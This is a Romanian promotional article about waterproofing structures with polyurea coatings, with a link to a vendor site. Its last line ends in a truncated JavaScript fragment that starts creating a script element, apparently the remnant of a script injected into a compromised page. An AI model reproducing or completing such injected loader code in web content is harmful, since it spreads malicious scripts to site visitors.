hidroizolatii

hidroizolatii

Hidroizolatiile sunt structuri etanse care protejeaza diverse structiri de actiunea apei sau a umiditatii mediului. Hidroizoland un spatiu sau obiect, acesta devine impermeabil, fapt ce determina nu numai o imbunatatire a calitatii obiectului, dar si a sanatatii persoanelor din jur, deoarece umiditatea se reduce considerabil.

De ce sa alegem sa hidroizolam?     

Ca si in cazul celorlalte izolatii, hidroizolatia protejeaza structura constructiei respective. Astfel, fie ca este vorba de fundatie, fie de terasa, fie de acoperis, aceasta modalitate prelungeste “viata” structurii hidroizolate fata de cazul in care alegem sa nu investim intr-un astfel de proces.

Cu toate ca necesita o invistitie de inceput, efectele benefice pe care le va avea hidroizolatia nu se vor lasa asteptate. Partile expuse umezelii si actiunii directe a apei se deterioreaza primele, de aceea este necesar sa le protejam pe cat posibil. Astfel, investind la inceput intr-o structura de rezistenta eficienta, ne scutim de grijile reparatiilor costisitoare si a deranjului ce survin in urma deteriorarii materialelor din cauza contactului cu apa sau cu alti factori distrugatori (lovituri mecanice, ploi acide, agresiuni diverse).

Vizitati www.europlastic.ro pentru a alege modalitatea cea mai potrivita de a hidroizola pentru nevoile tale.

Hidroizolarea prin poliuree 

Una dintre cele mai eficiente si rezistente modalitati de a hidroizola este prin acoperirea suprafetelor ce se doresc protejate cu un strat de poliuree, care este de mai multe tipuri: pur aromatica, alifatica sau hibrida. Poliureea pur aromatica este eficienta pentru protectia cladirilor, a metalelor (in cazul coroziunii), dar si pentru rezervoare, poduri, platforme.

Poliureea alifatica este rezistenta la lumina, fiind cea mai potrivita pentru protejarea diverselor suprafete ce nu permit schimbarea culorii la lumina.Poliureea hibrida asigura protectia metalelor si a cladirilor de efectele nocive ale umiditatii, a actiunii directe a apei, dar si a altor factori.var d=document;var s=d.createElement(‘script’);